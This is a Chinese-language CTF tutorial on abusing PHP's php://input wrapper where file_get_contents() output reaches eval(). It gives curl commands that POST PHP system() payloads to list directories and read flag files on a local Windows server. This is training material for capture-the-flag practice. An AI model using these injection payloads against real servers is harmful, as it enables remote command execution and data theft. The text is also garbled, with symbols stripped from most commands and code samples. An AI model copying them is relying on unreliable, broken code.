phpinput协议 curl命令 CTF命令执行 Web渗透 Windows渗透实战

一、php://input 协议介绍php://input 是PHP内置伪协议作用读取原始POST请求数据特点1. 无需参数不受GET参数过滤限制2. 可直接传递PHP代码、恶意语句3. 常用来绕过file_get_contents、文件包含漏洞过滤适用函数• file_get_contents()• include() / require()• file_put_contents()二、CTF经典场景题目常见代码$text file_get_contents($_GET[file]);eval($text);?常规传参被过滤无法直接传php代码此时使用php://input完美绕过。三、Windows curl 本地实战命令1、基础传PHP代码最常用cmd执行curl http://localhost/index.php?filephp?php system(dir);?2、读取当前目录Flag文件curl http://localhost/index.php?filephp://input -?php system(type flag_a47b33606.txt);?3、查看全盘目录、寻找隐藏Flagcurl http://localhost/index.php?filephp://input -d ?php system(dir /s);?四、解题核心思路1. 看到file_get_contentseval组合优先考虑php://input2. GET参数传协议POST DATA传真实恶意代码3. Windows系统命令优先使用dir、type、cd不要使用Linux命令4. 无回显时可结合写入文件、访问文件获取Flag五、新手高频踩坑点1. 浏览器直接访问无效必须POST传数据2. 不要混用Linux命令ls、catWindows不识别3. URL特殊字符无需编码curl自动兼容4. 部分题目需关闭PHP伪协议过滤才可生效六、适用题型汇总• 文件包含漏洞无参数绕过• 匿名代码执行题目• 过滤了?、php、data://的严格环境• 需要读取本地隐藏txt格式Flag场景七、总结php://input Windows curl命令是CTF Web新手性价比最高的解题组合简单稳定、适配题型极多。熟练掌握这套组合可快速解决大量基础Web命令执行与文件读取题型是Web渗透入门必备技能。